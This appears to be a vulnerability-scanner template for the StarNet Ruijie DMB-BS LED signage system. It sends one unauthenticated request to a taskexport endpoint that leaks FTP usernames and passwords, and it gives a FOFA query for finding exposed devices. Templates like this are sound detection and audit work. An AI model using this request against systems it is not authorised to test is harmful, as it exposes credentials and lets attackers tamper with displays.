id: starnet-dmb-bs-ftp-credentials

info: 
  name: StarNet DMB-BS LED System FTP Credentials Exposure
  author: brucelsone
  severity: medium
  description: |
    A vulnerability in the StarNet Ruijie DMB-BS LED System's taskexport interface exposes FTP server credentials and connection details. Attackers can leverage this to access and potentially modify LED display content through unauthorized FTP access.
  reference:
    - https://www.ddpoc.com/DVB-2024-7055.html
    - https://blog.csdn.net/shelter1234567/article/details/145521914
  metadata:
    verified: true
    max-request: 1
    fofa-query: (app="STAR_NET-数字标牌系统" || -欢迎! -- BS3.2.02.38447- || icon_hash="-260118452")
  tags: starnet,ruijie,ftp,password,exposures

http:
  - method: GET
    path:
      - "{{RootURL}}/dmb/out/taskexport.jsp?taskcode"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains_all(body,'user','pwd')"
